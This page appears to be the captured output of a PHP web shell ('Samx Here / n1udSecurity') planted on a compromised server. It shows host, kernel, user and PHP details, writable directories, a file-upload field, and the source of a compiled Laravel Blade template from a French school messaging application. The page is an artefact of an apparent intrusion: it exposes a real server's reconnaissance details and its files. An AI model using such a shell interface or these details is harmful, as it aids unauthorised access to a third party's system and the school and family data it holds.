Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/pragmaclasse_recette/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/pragmaclasse_recette/storage/framework/views/d626f4eccb2c2a992fa2729c1d57ebf126e85c11.php
<div class="bloc-manager-container">
    <div class="bloc-manager bg-info text-white inbox-part" v-if="display == 'inbox'">
        <h3>
            Fils de discussions
            <button v-if="filAffiche" class="btn btn-secondary btn-back" @click.prevent="refreshList()">
                <span class="icon-action"><?php echo file_get_contents('img/svg/back-arrow.svg'); ?></span>Retour
            </button>
            <button class="btn btn-primary" @click.prevent="switchDisplay()" v-if="isDisplayableNew">
                <span class="icon-action"><?php echo file_get_contents('img/svg/envelope.svg'); ?></span>Nouveau message
            </button>
        </h3>
        <template v-if="!filAffiche">
            <table class="liste-fils" v-if="filteredListeFils.length > 0">

                <thead class="thead-dark">
                    <tr>
                        <th scope="col" class="action-sort col-title" @click.prevent="sortMessages('title')">Titre</th>
                        <th scope="col" class="action-sort col-subject" @click.prevent="sortMessages('subject')">Sujet
                        </th>
                        <th scope="col" class="action-sort col-sender" @click.prevent="sortMessages('sender')">
                            Expéditeur
                        </th>
                        <th scope="col" class="action-sort col-receiver" @click.prevent="sortMessages('receiver')">
                            Destinataire</th>
                        <th scope="col" class="action-sort col-date" @click.prevent="sortMessages('date')">Date</th>
                    </tr>
                </thead>
                <tbody>
                    <tr class="single-message-line" v-for="fil in filteredListeFils" @click="ouvrirFil(fil.idFil)">
                        <td>{{fil.titre}}</td>
                        <td>{{displaysubject(fil.idSujet)}}</td>
                        <td>{{fil.sender.prenom + ' ' + fil.sender.nom}}</td>
                        <td v-html="afficherDestinataire(fil)"></td>
                        <td>{{displayDate(fil)}}</td>
                    </tr>
                </tbody>
            </table>
        </template>
        <template v-else>
            <parent-pupil-messages-fil @answered="answered" :pupil-prop="pupilProp" :class-prop="classProp"
                :type-messages="typeMessages" :dictionaries="dictionaries" :fil="filAffiche" :all-levels="allLevels">
            </parent-pupil-messages-fil>
        </template>
    </div>
    <div class="bloc-manager border border-info new-part" v-if="display == 'new'">
        <div class="new-message-part" v-if="isDisplayableNew">
            <parent-pupil-messages-new :pupil-prop="pupilProp" :type-messages="typeMessages" :dictionaries="dictionaries" :all-levels="allLevels" @sent="newSent" @switchDisplay=switchDisplay()>
        </parent-pupil-messages-new>
        </div>
    </div>
</div><?php /**PATH /home/pragmatice/pragmaclasse_recette/resources/views/components/parent/pupil/messages/fils.blade.php ENDPATH**/ ?>

SAMX